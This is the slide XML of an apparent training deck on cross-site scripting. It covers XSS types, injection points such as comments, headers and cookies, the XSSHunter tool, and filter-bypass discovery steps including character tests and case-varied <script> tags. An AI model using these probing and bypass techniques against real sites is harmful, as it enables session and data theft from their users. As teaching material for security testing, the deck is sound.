              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24074657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XSS – Types – Reflective</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63ECBE16-E616-4A10-9DB4-B80C91B82627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000601" y="2298583"/>
            <a:ext cx="9531907" cy="2669343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27529DB5-1547-44DA-8ECA-A95D001F72CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327355" y="5427094"/>
            <a:ext cx="8809703" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>May be called Non-Persistent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33124698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XSS – Types – Stored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23218FA8-208A-40E6-B5F3-A3768E554081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="592139" y="2143902"/>
            <a:ext cx="10088992" cy="2909878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946E12BC-207C-40CF-A07D-36ED24980C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043553" y="5768459"/>
            <a:ext cx="5227008" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>May be called Persistent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960347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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top 10 Risk Factor Summary</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54273CF7-DF2A-423C-B37F-A2B714559827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1644554"/>
            <a:ext cx="7696200" cy="4894358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3465044147"/>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XSS – Types – DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D335D2-4846-4473-B565-4A3F211478CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459936" y="2102865"/>
            <a:ext cx="7790476" cy="3123809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5378C616-59C8-4B30-8475-91E27F45FDF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127818" y="5591350"/>
            <a:ext cx="4444181" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Document Object Model </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15421598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E521-A626-4A75-86E1-7705508317BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70959218-DEE6-4A87-A1D1-9F172B92E411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flash-based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mutation XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relative Path Overwrite XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Blind XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>vulnerabilities are a variant of Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> vulnerabilities. They occur when the attacker input is saved by the server and displayed in another part of the application or in another application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1883026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7D15C-07F8-4226-B419-51CDFD4267B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind XSS - Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E54EBC8E-439B-4CC6-9F5A-AE1C62F87307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>XSSHunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9D9F30-ED52-4069-ACA7-7E075C4A98C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295399" y="2298620"/>
            <a:ext cx="7676463" cy="3944664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18352219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076CB-1299-4AA0-A678-B4CF5CE5B523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105275" y="76200"/>
            <a:ext cx="7883525" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable XXS Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{108453DD-CB5A-4037-B1F9-8642C226DFCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="247649" y="1462236"/>
            <a:ext cx="10376535" cy="3933528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC7B63D-9532-47C0-A555-AA0184463DB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="91440" y="5607504"/>
            <a:ext cx="10532744" cy="571429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24994043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FB75C8-F9B5-4B64-AEAE-D29F3164FEF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where do we find it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80B6B92-B97C-4E1C-8D6A-79B40994DAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462116" y="1612491"/>
            <a:ext cx="11120284" cy="4513674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anywhere we can input our text is an opportunity for us to inject our code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blog comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forum data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chat/Messaging functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account profile information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guest book</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contact Us / Feedback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC4C746-E5FA-47B8-B9AC-4B73ACB8ACB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6286499" y="2419350"/>
            <a:ext cx="4581525" cy="3113455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>URL query parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>POST parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Hidden forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>HTTP Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Useragent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19549764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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS – Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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209550" y="1452785"/>
            <a:ext cx="10918698" cy="4719415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Bypassing Filters – Main Goal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reflection test   -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unique string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE27336-885C-40E0-82F2-5CF8F04E4D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2581275"/>
            <a:ext cx="12192000" cy="4090475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1201650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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS – Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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61925" y="1452785"/>
            <a:ext cx="10966323" cy="4719415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Filter test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- what gets encoded vs what doesn’t </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()/\=&lt;&gt;?+&amp;”; //{}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tag testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"/>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SCript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
